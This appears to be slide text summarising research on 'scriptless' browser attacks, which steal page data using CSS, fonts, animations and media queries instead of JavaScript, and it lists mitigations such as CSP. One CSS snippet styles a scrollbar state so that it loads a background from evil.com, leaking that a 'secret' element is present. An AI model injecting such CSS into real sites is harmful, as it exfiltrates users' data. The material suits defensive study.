SCRIPT LESS ATTACKS STEALING THE PIE WITHOUT TOUCHING THE SILL

advertisement
SCRIPT LESS ATTACKS
STEALING THE PIE WITHOUT TOUCHING THE SILL
BACKGROUND
• XSS recently replaced SQL injection and related server-side injection
attacks as the number one threat in the OWASP (Open Web
Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird, Windows 8
are using HTML, security extensions like NoScript are being used by
users.
• Given all these defense strategies, we expect that attackers will thrive
towards developing “Scriptless Attacks” which achieve same goal as
XSS attacks without using any scripting.
BEYOND SCRIPT-BASED ATTACKS
• Assumptions:
• The attacker can inject arbitrary data into the
DOM rendered by the browser
• We assume that scripting is completely
disabled
• The following browser features to be useful
building blocks in constructing attacks
- Web-fonts based on SVG and WOFF
• Attacker employ these fonts and utilize their
features to vary the properties of displayed
website content.
• CSS-based Animations
• With CSS based animations, it is possible to over time
change a wide range of CSS and DOM properties
without using any script code
ATTACK
COMPONENTS
• The CSS Content Property
• CSS allows to use a property called content to extract
arbitrary attribute values and display the value either
before, after, or instead of the selected element
a[href^=http://]:after{content:attr(href)}
• CSS Media Queries
<style type="text/css">
@media screen and (min -width:
401px){
*{ background:green;}
body:after{content:’larger view port’}
}
@media screen and (max -width:
400px) {
*{ background:red;}
body:after{content:’smaller view port’ }
}
</style >
<style type="text/css">
div#s::-webkit -scrollbar -track -piece
:vertical:increment {
background:red url(// evil.com?s); }
</style >
• To mitigate this attack,
• it is recommended to treat scrollbar backgrounds and
scrollbar state backgrounds equally;
• all background images and similar external resources
should be loaded during page-load and not on
appearance or state occurrence.
MEASUREMENT-BASED
CONTENT EXFILTRATION-
<div id="s">secret </div >
USING SMART SCROLLBARS
• To enable a purely CSS-based data exfiltration attack,
we utilize all of the available features listed in above
section.
MITIGATION TECHNIQUES
• We conclude that several layers of protection are necessary to
effectively and holistically defend against CSS-, SVG- and
HTML-based data leakage
1. Content Security Policy (CSP)
2. Detecting Detached Views
3. Miscellaneous Defense Techniques
Conclusion :
While the attacks discussed in this paper presumably do not represent the entirety
of ways to illegitimately retrieve sensitive user-data, we believe that the attack
components discussed in this paper are of great importance to other attack vectors.
Download